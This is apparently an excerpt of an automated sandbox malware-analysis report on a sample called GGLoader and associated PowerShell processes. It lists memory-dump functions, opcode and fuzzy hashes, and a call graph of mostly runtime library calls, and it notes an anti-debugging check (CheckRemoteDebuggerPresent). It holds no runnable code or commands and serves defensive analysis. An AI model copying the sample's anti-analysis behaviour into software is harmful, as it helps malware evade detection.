                                                                                                     • Function 7ffd9b885d4d-7ffd9b885e58: 3 basic blocks (7ffd9b885d4d-7ffd9b885e0d, 7ffd9b885e0f, 7ffd9b885e15-7ffd9b885e58); the first block calls CheckRemoteDebuggerPresent. Block graph and executed/not-executed colouring omitted (rendered as an image in the original report).
                                                                                                     APIs
                                                                                                     • CheckRemoteDebuggerPresent
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1715511386.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b880000_GGLoader.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CheckDebuggerPresentRemote
                                                                                                    • String ID:
                                                                                                    • API String ID: 3662101638-0
                                                                                                    • Opcode ID: 5f37f65186263232e3de33e5b14a5abc4d96ffc5ae163b2cc4634528c0cd2c1f
                                                                                                    • Instruction ID: 07f2b850a5e2c69873d6ca5f9ed9a75c4d26284d1ea3257a290f7b4ea577e0dc
                                                                                                    • Opcode Fuzzy Hash: 5f37f65186263232e3de33e5b14a5abc4d96ffc5ae163b2cc4634528c0cd2c1f
                                                                                                    • Instruction Fuzzy Hash: 9841323190C75C8FCB59DF98C84A6E97BF0EF65321F0942ABD489C7292D734A846CB91

                                                                                                     Control-flow Graph
                                                                                                     • Function 7ffd9b8842f6-7ffd9b8847b3: 44 basic blocks, several short self-looping blocks (e.g. 7ffd9b884408-7ffd9b88441b, 7ffd9b88449b-7ffd9b8844ae, 7ffd9b8845b3-7ffd9b8845c6), and a call to 7ffd9b8847b4 from block 7ffd9b884733-7ffd9b884798; no Windows API calls. Block graph and executed/not-executed colouring omitted (rendered as an image in the original report).
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1715511386.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b880000_GGLoader.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9c1b11edff9e8b0443dec50b7c3907077d8ca1a4caaf34d0ea67750461c42aaf
                                                                                                    • Instruction ID: bfce3e743a9032da346071bf6d1056674f3173612e567a2ebf73e6f27d8df0a6
                                                                                                    • Opcode Fuzzy Hash: 9c1b11edff9e8b0443dec50b7c3907077d8ca1a4caaf34d0ea67750461c42aaf
                                                                                                    • Instruction Fuzzy Hash: 28F1B731A09A8D8FEBA8DF28C8657E937D1FF58310F04426EE85DC7295DB3899458B81

                                                                                                     Control-flow Graph
                                                                                                     • Function 7ffd9b8850a2-7ffd9b88552f: 44 basic blocks with the same shape as the 7ffd9b8842f6 function (repeated short self-looping blocks such as 7ffd9b8851b8-7ffd9b8851cb and 7ffd9b88524b-7ffd9b88525e) and a call to 7ffd9b885530 from block 7ffd9b8854b2-7ffd9b885514; no Windows API calls. Block graph and executed/not-executed colouring omitted (rendered as an image in the original report).
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1715511386.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b880000_GGLoader.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 8265decfe26f3b5db62023088462198d538c3ba0beb56b08c50bcbfd02d60415
                                                                                                    • Instruction ID: af6b58428ffb48a9739b2e90b80f12a97ddc7fb6b4731f9fa438218186dd78d4
                                                                                                    • Opcode Fuzzy Hash: 8265decfe26f3b5db62023088462198d538c3ba0beb56b08c50bcbfd02d60415
                                                                                                    • Instruction Fuzzy Hash: 55E1D630609A4E8FEBA8DF68C8657E937E1FF58310F04426EE85DC7295DF74A9418B81

                                                                                                     Control-flow Graph
                                                                                                     • Function 7ffd9b885f38-7ffd9b886018: 5 basic blocks (7ffd9b885f38-7ffd9b885f3f, 7ffd9b885f41-7ffd9b885f49, 7ffd9b885f4a-7ffd9b885fe2, 7ffd9b885fe4, 7ffd9b885fea-7ffd9b886018); block 7ffd9b885f4a-7ffd9b885fe2 calls CloseHandle. Block graph and executed/not-executed colouring omitted (rendered as an image in the original report).
                                                                                                     APIs
                                                                                                     • CloseHandle
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1715511386.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b880000_GGLoader.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseHandle
                                                                                                    • String ID:
                                                                                                    • API String ID: 2962429428-0
                                                                                                    • Opcode ID: 1b2df148fb691094e983fd5b36ac5eaac4ee8817ce1ac4eb67c872e994a1acb8
                                                                                                    • Instruction ID: f65e44775580aee89351469d637d7d6f3f5c1672396696cb8a5014047193ac34
                                                                                                    • Opcode Fuzzy Hash: 1b2df148fb691094e983fd5b36ac5eaac4ee8817ce1ac4eb67c872e994a1acb8
                                                                                                    • Instruction Fuzzy Hash: F531043190CA4C8FDB58DBA8C816BF9BBF0EF55320F00426ED059D3192DB74A856CB91
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1979758711.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffd9b970000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: fde601912bcb8fd6af04fa957eb3a841d9ff3791760b27a6ac137fb4ca532870
                                                                                                    • Instruction ID: 580cd805c72c6c3850bb026637d294d38436edaaaae5cfbeee78cc6925e88071
                                                                                                    • Opcode Fuzzy Hash: fde601912bcb8fd6af04fa957eb3a841d9ff3791760b27a6ac137fb4ca532870
                                                                                                    • Instruction Fuzzy Hash: B3D13772B1FA8E1FE7A5ABA848A55B57BE0EF56314B0901FED44CC70E3DA18AD05C341
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1976232276.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffd9b8a0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: cf32499109d6d6007be64a3feb64dbbd887e6097d118b4d994f1d1eee7da4cfc
                                                                                                    • Instruction ID: a283e720c703c42b74f993e56095be86f662e02f54afc4ddfa39b130cd0c52ec
                                                                                                    • Opcode Fuzzy Hash: cf32499109d6d6007be64a3feb64dbbd887e6097d118b4d994f1d1eee7da4cfc
                                                                                                    • Instruction Fuzzy Hash: 4211577180E7C98FDB579B748C294947FB0AE17210B0A02DBD488CB0B3D6695908C7A2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1976232276.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffd9b8a0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c438d66b1fd18fb4aea6dc5b5fa0e8edf8d5d198a6384f8207aaa07bc49ef932
                                                                                                    • Instruction ID: 8ae6333b13157490509c354eb4f12dbbde1c58758fade48a3f6eeb581d4e954f
                                                                                                    • Opcode Fuzzy Hash: c438d66b1fd18fb4aea6dc5b5fa0e8edf8d5d198a6384f8207aaa07bc49ef932
                                                                                                    • Instruction Fuzzy Hash: D7416C72A0EB8C5FEB65DBAC98965E93FE0EF56320F09407BC058C71A3ED3564068791
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1976232276.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffd9b8a0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c9ceb3acdee8f9f05bcdf3ea796f0f077a8d16945f7c61e547c6083e02288a5f
                                                                                                    • Instruction ID: 123ac3d8fbb734692da93f2cf33778911b092164e29d5c964cda2c7f43f2f2f6
                                                                                                    • Opcode Fuzzy Hash: c9ceb3acdee8f9f05bcdf3ea796f0f077a8d16945f7c61e547c6083e02288a5f
                                                                                                    • Instruction Fuzzy Hash: F731D23191CB4C8FDB189F5C984A6A97BE0FB99721F00426FE449C3252DB74A956CBC2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1973376998.00007FFD9B78D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B78D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffd9b78d000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 84e4da84efb7a51fce14da70d86f151c2ca1ddb5975049c754ac93f51fb58f0f
                                                                                                    • Instruction ID: fc3b3edc3dacb5c9bc56cfc46d132a86cc5bf80fbb96ae430287aa86a7d81f56
                                                                                                    • Opcode Fuzzy Hash: 84e4da84efb7a51fce14da70d86f151c2ca1ddb5975049c754ac93f51fb58f0f
                                                                                                    • Instruction Fuzzy Hash: 13014F3160CE088F9AA4EF1EE48595237E0FB98320710075AD41EC756AD731F891CBC1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1976232276.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffd9b8a0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                    • Instruction ID: 2d8e5c199f5335979778887b622e34919a8febb75adba4d6537578fae4bb4e89
                                                                                                    • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                    • Instruction Fuzzy Hash: 8601677121CB0D4FD748EF0CE451AA6B7E0FB99364F10056DE58AC36A5DA36E882CB45
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1979758711.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffd9b970000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d49f48d5b021904caadbcd6d0daa43ac9521a56e5ed5f5023db960c658152d1a
                                                                                                    • Instruction ID: d9c3a3265308006e186e4cd60e2957e0828dfeece0f971ed66ab8b386f4279d0
                                                                                                    • Opcode Fuzzy Hash: d49f48d5b021904caadbcd6d0daa43ac9521a56e5ed5f5023db960c658152d1a
                                                                                                    • Instruction Fuzzy Hash: A7F0E232B0E5098FD768EB5CE4919A877E0FF4532071500BAE06DC76B7CA25EC40C740
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1979758711.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffd9b970000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 65adb5a10c14eb8d05d50552459595f239955bcfdfa322fab2486d45b58655c3
                                                                                                    • Instruction ID: 60d68dceb0a419c920a41aaf96ce962fe5ace1bd58de5a30c46ff8914b6c6c60
                                                                                                    • Opcode Fuzzy Hash: 65adb5a10c14eb8d05d50552459595f239955bcfdfa322fab2486d45b58655c3
                                                                                                    • Instruction Fuzzy Hash: F2F05E32B0E5898FDB64EB5CE4919E877E0EF0532071500FAE16DCB5A3CA25AC54C740
                                                                                                    Strings
                                                                                                    Memory Dump Source
• Source File: 00000001.00000002.1976232276.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffd9b8a0000_powershell.jbxd
Similarity
• API ID:
• String ID: L_^$L_^$L_^$L_^$L_^
• API String ID: 0-205492149
• Opcode ID: cf8b465184b697936e0c93d167afd45dee8c0a5b3774993a14d791dd685514d9
• Instruction ID: b6fe7eaf95c7c6877547a375bf735b1a192f8999d61a1c57eb3f44a067a98ee2
• Opcode Fuzzy Hash: cf8b465184b697936e0c93d167afd45dee8c0a5b3774993a14d791dd685514d9
• Instruction Fuzzy Hash: 9221DB72A2D7938FC7165A3898658E53B50AF46724F4903FACCF94F1E3EB242506C672
Memory Dump Source
• Source File: 00000003.00000002.1792614656.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffd9b950000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6a7d69652ea30ec097d36244e5778e2409b8cad3710aaa190509fb0db010afe0
• Instruction ID: 3af174635a51198bfb5d1d3fd56a285c2c9262490a9d3777b4820a9e47159eb8
• Opcode Fuzzy Hash: 6a7d69652ea30ec097d36244e5778e2409b8cad3710aaa190509fb0db010afe0
• Instruction Fuzzy Hash: 8AC14732B1EA4D5FEBA4DBA894645B477D1EF99710F0900BED84DC32A3DE25AC01C741
Memory Dump Source
• Source File: 00000003.00000002.1792230912.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffd9b880000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
• Instruction ID: 7942ddcb7b366def54c675fdc0a42c1b9c7b229ae68d60287c1eb1a1f3edd8da
• Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
• Instruction Fuzzy Hash: 9001A73020CB0C4FD748EF0CE451AA6B3E0FB89320F10056DE58AC36A1DA32E882CB41

Execution Graph

Execution Coverage: 7.5%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 6.4%
Total number of Nodes: 1308
Total number of Limit Nodes: 22
7aa3b6 23925 7aa3e1 LeaveCriticalSection __fread_nolock 23901->23925 23904 7a9b37 23903->23904 23905 7a9b4e 23904->23905 24047 7a9bd6 41 API calls 2 library calls 23904->24047 23906 7a9b61 23905->23906 24048 7a9bd6 41 API calls 2 library calls 23905->24048 23906->23709 23909->23899 23911 7aa419 23910->23911 23912 7aa3f6 23910->23912 23914 7aa411 23911->23914 23926 7aa226 23911->23926 23950 7a9d72 41 API calls 2 library calls 23912->23950 23914->23901 23920 7aa445 23943 7b37d0 23920->23943 23923 7b3705 ___free_lconv_mon 14 API calls 23923->23914 23924->23896 23925->23896 23927 7aa266 23926->23927 23928 7aa23f 23926->23928 23932 7b3aa9 23927->23932 23928->23927 23929 7b262b __fread_nolock 41 API calls 23928->23929 23930 7aa25b 23929->23930 23951 7b33fd 23930->23951 23933 7b3ac0 23932->23933 23934 7aa439 23932->23934 23933->23934 23935 7b3705 ___free_lconv_mon 14 API calls 23933->23935 23936 7b262b 23934->23936 23935->23934 23937 7b264c 23936->23937 23938 7b2637 23936->23938 23937->23920 24007 7ae7f3 14 API calls __dosmaperr 23938->24007 23940 7b263c 24008 7a9def 41 API calls ___std_exception_copy 23940->24008 23942 7b2647 23942->23920 23944 7b37f9 23943->23944 23945 7aa44c 23943->23945 23946 7b3848 23944->23946 23948 7b3820 23944->23948 23945->23914 23945->23923 24017 7a9d72 41 API calls 2 library calls 23946->24017 24009 7b373f 23948->24009 23950->23914 23953 7b3409 __FrameHandler3::FrameUnwindToState 23951->23953 23952 7b34cd 23992 7a9d72 41 API calls 2 library calls 23952->23992 23953->23952 23955 7b345e 23953->23955 23961 7b3411 23953->23961 23962 7bb43a EnterCriticalSection 23955->23962 23957 7b3464 23958 7b3481 23957->23958 23963 7b3505 23957->23963 23991 7b34c5 LeaveCriticalSection __wsopen_s 23958->23991 23961->23927 23962->23957 23964 7b352a 23963->23964 23988 7b354d __wsopen_s 23963->23988 23965 7b352e 23964->23965 23967 7b358c 23964->23967 24000 7a9d72 41 API calls 2 library calls 23965->24000 23968 7b35a3 23967->23968 24001 7b7253 43 API calls 
__fread_nolock 23967->24001 23993 7b3052 23968->23993 23972 7b35f3 23974 7b3607 23972->23974 23975 7b3656 WriteFile 23972->23975 23973 7b35b3 23976 7b35ba 23973->23976 23977 7b35dd 23973->23977 23978 7b360f 23974->23978 23979 7b3644 23974->23979 23980 7b3678 GetLastError 23975->23980 23975->23988 23976->23988 24002 7b2fea 6 API calls __wsopen_s 23976->24002 24003 7b2c18 47 API calls 4 library calls 23977->24003 23982 7b3632 23978->23982 23983 7b3614 23978->23983 24006 7b30d0 7 API calls 2 library calls 23979->24006 23980->23988 24005 7b3294 8 API calls 3 library calls 23982->24005 23986 7b361d 23983->23986 23983->23988 24004 7b31ab 7 API calls 2 library calls 23986->24004 23988->23958 23989 7b35ee 23989->23988 23991->23961 23992->23961 23994 7be037 __fread_nolock 41 API calls 23993->23994 23995 7b3064 23994->23995 23996 7b3092 23995->23996 23997 7abff0 std::_Locinfo::_Locinfo_dtor 41 API calls 23995->23997 23999 7b30c5 23995->23999 23998 7b30ac GetConsoleMode 23996->23998 23996->23999 23997->23996 23998->23999 23999->23972 23999->23973 24000->23988 24001->23968 24002->23988 24003->23989 24004->23988 24005->23989 24006->23989 24007->23940 24008->23942 24010 7b374b __FrameHandler3::FrameUnwindToState 24009->24010 24018 7bb43a EnterCriticalSection 24010->24018 24012 7b3759 24013 7b378a 24012->24013 24019 7b38a3 24012->24019 24032 7b37c4 LeaveCriticalSection __wsopen_s 24013->24032 24016 7b37ad 24016->23945 24017->23945 24018->24012 24033 7bb6b6 24019->24033 24021 7b38b9 24046 7bb625 15 API calls 2 library calls 24021->24046 24023 7b38b3 24023->24021 24024 7bb6b6 __wsopen_s 41 API calls 24023->24024 24031 7b38eb 24023->24031 24028 7b38e2 24024->24028 24025 7bb6b6 __wsopen_s 41 API calls 24026 7b38f7 CloseHandle 24025->24026 24026->24021 24029 7b3903 GetLastError 24026->24029 24027 7b3911 __wsopen_s 24027->24013 24030 7bb6b6 __wsopen_s 41 API calls 24028->24030 24029->24021 24030->24031 24031->24021 24031->24025 24032->24016 24034 7bb6d8 24033->24034 24035 7bb6c3 
24033->24035 24037 7ae7e0 __dosmaperr 14 API calls 24034->24037 24040 7bb6fd 24034->24040 24036 7ae7e0 __dosmaperr 14 API calls 24035->24036 24038 7bb6c8 24036->24038 24041 7bb708 24037->24041 24039 7ae7f3 __dosmaperr 14 API calls 24038->24039 24042 7bb6d0 24039->24042 24040->24023 24043 7ae7f3 __dosmaperr 14 API calls 24041->24043 24042->24023 24044 7bb710 24043->24044 24045 7a9def ___std_exception_copy 41 API calls 24044->24045 24045->24042 24046->24027 24047->23905 24048->23906 24049->23714 24065 7adfcd 24050->24065 24054 7a4524 24055 7a4534 24054->24055 24056 7adfcd std::_Locinfo::_Locinfo_dtor 68 API calls 24054->24056 24071 7a4358 15 API calls 2 library calls 24055->24071 24056->24055 24058 798a99 24059 7a454b 68 API calls std::_Locinfo::_Locinfo_dtor 24058->24059 24059->23741 24061 7b3705 ___free_lconv_mon 14 API calls 24060->24061 24062 7ac9d6 24061->24062 24062->23742 24063->23757 24072 7b53b7 24065->24072 24067 7adfda 24068 7add78 std::_Locinfo::_Locinfo_dtor 68 API calls 24067->24068 24069 7a450c 24068->24069 24070 7a4358 15 API calls 2 library calls 24069->24070 24070->24054 24071->24058 24093 7b4d66 5 API calls std::_Locinfo::_Locinfo_dtor 24072->24093 24074 7b53bc 24094 7b4d80 5 API calls std::_Locinfo::_Locinfo_dtor 24074->24094 24076 7b53c1 24095 7b4d9a 5 API calls std::_Locinfo::_Locinfo_dtor 24076->24095 24078 7b53c6 24096 7b4db4 5 API calls std::_Locinfo::_Locinfo_dtor 24078->24096 24080 7b53cb 24097 7b4dce 5 API calls std::_Locinfo::_Locinfo_dtor 24080->24097 24082 7b53d0 24098 7b4de8 5 API calls std::_Locinfo::_Locinfo_dtor 24082->24098 24084 7b53d5 24099 7b4e02 5 API calls std::_Locinfo::_Locinfo_dtor 24084->24099 24086 7b53da 24100 7b4e1c 5 API calls std::_Locinfo::_Locinfo_dtor 24086->24100 24088 7b53df 24101 7b4e50 5 API calls std::_Locinfo::_Locinfo_dtor 24088->24101 24090 7b53e4 24102 7b4e36 5 API calls std::_Locinfo::_Locinfo_dtor 24090->24102 24092 7b53e9 24092->24092 24093->24074 24094->24076 24095->24078 24096->24080 24097->24082 
24098->24084 24099->24086 24100->24088 24101->24090 24102->24092 24103->23761 24104->23763 24105->23765 24106->23767 24108 7974cb 24107->24108 24109 79748f 24107->24109 24108->23772 24113 7972a0 24109->24113 24111 7974b7 24112 7aa477 71 API calls 24111->24112 24112->24108 24114 79735a 24113->24114 24115 7972bd 24113->24115 24116 7a53be __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 24114->24116 24115->24114 24121 7972c7 24115->24121 24117 797367 24116->24117 24117->24111 24118 797348 24119 7a53be __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 24118->24119 24120 797356 24119->24120 24120->24111 24121->24118 24122 7972f6 24121->24122 24124 797310 24121->24124 24122->24118 24123 7972fb 24122->24123 24127 7a53be __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 24123->24127 24125 797331 24124->24125 24132 7ac72b 24124->24132 24126 7a53be __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 24125->24126 24129 797344 24126->24129 24130 79730c 24127->24130 24129->24111 24130->24111 24133 7ac73e ___std_exception_copy 24132->24133 24138 7ac50a 24133->24138 24135 7ac753 24136 7a9b2b ___std_exception_copy 41 API calls 24135->24136 24137 79732a 24136->24137 24137->24118 24137->24125 24139 7ac518 24138->24139 24140 7ac540 24138->24140 24139->24140 24141 7ac547 24139->24141 24142 7ac525 24139->24142 24140->24135 24146 7ac463 24141->24146 24154 7a9d72 41 API calls 2 library calls 24142->24154 24147 7ac46f __FrameHandler3::FrameUnwindToState 24146->24147 24155 7ac413 EnterCriticalSection 24147->24155 24149 7ac47d 24156 7ac4be 24149->24156 24153 7ac49b 24153->24135 24154->24140 24155->24149 24164 7b4a2a 24156->24164 24162 7ac48a 24163 7ac4b2 LeaveCriticalSection __fread_nolock 24162->24163 24163->24153 24165 7b49ef 41 API calls 24164->24165 24166 7b4a3b 24165->24166 24167 7ac4d6 24166->24167 24168 7b3ae9 __fread_nolock 15 API calls 24166->24168 24171 7ac581 24167->24171 24169 7b4a95 24168->24169 24170 7b3705 ___free_lconv_mon 14 API calls 24169->24170 
24170->24167 24174 7ac593 24171->24174 24175 7ac4f4 24171->24175 24172 7ac5a1 24173 7a9d72 ___std_exception_copy 41 API calls 24172->24173 24173->24175 24174->24172 24174->24175 24178 7ac5d7 _Yarn 24174->24178 24180 7b4ad6 66 API calls ___scrt_uninitialize_crt 24175->24180 24176 7aa226 ___scrt_uninitialize_crt 66 API calls 24176->24178 24177 7b262b __fread_nolock 41 API calls 24177->24178 24178->24175 24178->24176 24178->24177 24179 7b33fd __wsopen_s 66 API calls 24178->24179 24179->24178 24180->24162 24183->23344 24185->23368 24188 795f55 24187->24188 24190 795f6e 24188->24190 24197 7982e0 24188->24197 24193 795fc6 24190->24193 24207 798b80 72 API calls 7 library calls 24190->24207 24191 793a20 43 API calls 24195 796085 24191->24195 24193->24191 24194 7941f7 24194->23388 24195->24194 24208 798410 43 API calls 24195->24208 24198 7983cf 24197->24198 24199 798324 24197->24199 24200 7a53be __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 24198->24200 24209 797100 43 API calls 24199->24209 24202 798402 24200->24202 24202->24190 24203 79832d 24204 7983b7 24203->24204 24205 793a20 43 API calls 24203->24205 24204->24198 24210 798410 43 API calls 24204->24210 24205->24204 24207->24193 24208->24194 24209->24203 24210->24198 24211->23400 24212->23402 24213->23404 24214->23406 24215->23408 24216->23410 24217->23412 24218->23414 24219->23418 24220->23420 24221->23424 24222->23426 24223->23430 24224->23432 24225->23436 24226->23438 24227->23442 24228->23444 24229->23448 24230->23450 24231->23454 24232->23456 24233->23460 24234->23462 24235->23466 24236->23468 24237->23472 24238->23474 24239->23478 24240->23480 24241->23484 24242->23486 24243->23490 24244->23492 24245->23496 24246->23498 24247->23502 24248->23504 24249->23508 24250->23510 24251->23514 24252->23516 24253->23520 24254->23522 24255->23526 24256->23528 24257->23530 24258->23532 24259->23534 24260->23536 24261->23538 24262->23540 24263->23543 24264->23558 24266 7adc54 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 
24265->24266 24266->23558 24268->23558 24269->23558 24270->23558 24271->23558 24272->23558 24274 7a322b CreateDirectoryA 24273->24274 24274->23562 24276 7a3e3b 24275->24276 24303 799bd0 24276->24303 24278 7a3e4f 24280 7a3e7b 24278->24280 24310 795500 24278->24310 24279 793a20 43 API calls 24281 7a3ef2 24279->24281 24280->24279 24281->23588 24284 7a3cb5 24283->24284 24285 7982e0 43 API calls 24284->24285 24287 7a3cce 24284->24287 24285->24287 24286 793a20 43 API calls 24289 7a3da0 24286->24289 24288 7a3d03 24287->24288 24457 795340 24287->24457 24462 795335 24287->24462 24288->24286 24290 7a3db7 24289->24290 24466 798410 43 API calls 24289->24466 24290->23588 24295 7b2340 __Getcoll 41 API calls 24294->24295 24296 7a3613 24295->24296 24296->23593 24298 7b2340 __Getcoll 41 API calls 24297->24298 24299 7adc88 24298->24299 24299->23597 24304 799c30 24303->24304 24305 799c03 24303->24305 24306 799c3c 24304->24306 24308 7982e0 43 API calls 24304->24308 24307 793a20 43 API calls 24305->24307 24306->24278 24309 799c1c 24307->24309 24308->24306 24309->24278 24315 79551f _Yarn 24310->24315 24311 795692 24312 7ad786 __fread_nolock 55 API calls 24311->24312 24313 795525 _Yarn 24311->24313 24312->24313 24313->24280 24315->24311 24315->24313 24316 7ad786 24315->24316 24319 7ad7a3 24316->24319 24320 7ad7af __FrameHandler3::FrameUnwindToState 24319->24320 24321 7ad7f9 24320->24321 24322 7ad7c2 __fread_nolock 24320->24322 24331 7ad79e 24320->24331 24332 7ac413 EnterCriticalSection 24321->24332 24346 7ae7f3 14 API calls __dosmaperr 24322->24346 24324 7ad803 24333 7ad5a0 24324->24333 24327 7ad7dc 24347 7a9def 41 API calls ___std_exception_copy 24327->24347 24331->24315 24332->24324 24335 7ad5b1 __fread_nolock 24333->24335 24345 7ad5cd 24333->24345 24334 7ad5bd 24349 7ae7f3 14 API calls __dosmaperr 24334->24349 24335->24334 24339 7ad60f __fread_nolock 24335->24339 24335->24345 24337 7ad5c2 24350 7a9def 41 API calls ___std_exception_copy 24337->24350 24340 7ad736 __fread_nolock 
24339->24340 24341 7b262b __fread_nolock 41 API calls 24339->24341 24339->24345 24351 7ad840 41 API calls 4 library calls 24339->24351 24352 7b6c6d 24339->24352 24417 7ae7f3 14 API calls __dosmaperr 24340->24417 24341->24339 24348 7ad838 LeaveCriticalSection __fread_nolock 24345->24348 24346->24327 24347->24331 24348->24331 24349->24337 24350->24345 24351->24339 24353 7b6c7f 24352->24353 24354 7b6c97 24352->24354 24427 7ae7e0 14 API calls __dosmaperr 24353->24427 24356 7b6fed 24354->24356 24361 7b6cdd 24354->24361 24449 7ae7e0 14 API calls __dosmaperr 24356->24449 24357 7b6c84 24428 7ae7f3 14 API calls __dosmaperr 24357->24428 24360 7b6ff2 24450 7ae7f3 14 API calls __dosmaperr 24360->24450 24362 7b6c8c 24361->24362 24364 7b6ce8 24361->24364 24368 7b6d18 24361->24368 24362->24339 24429 7ae7e0 14 API calls __dosmaperr 24364->24429 24365 7b6cf5 24451 7a9def 41 API calls ___std_exception_copy 24365->24451 24367 7b6ced 24430 7ae7f3 14 API calls __dosmaperr 24367->24430 24371 7b6d31 24368->24371 24372 7b6d4b 24368->24372 24373 7b6d7c 24368->24373 24371->24372 24374 7b6d36 24371->24374 24431 7ae7e0 14 API calls __dosmaperr 24372->24431 24434 7b3ae9 24373->24434 24418 7be037 24374->24418 24377 7b6d50 24432 7ae7f3 14 API calls __dosmaperr 24377->24432 24381 7b3705 ___free_lconv_mon 14 API calls 24385 7b6d96 24381->24385 24382 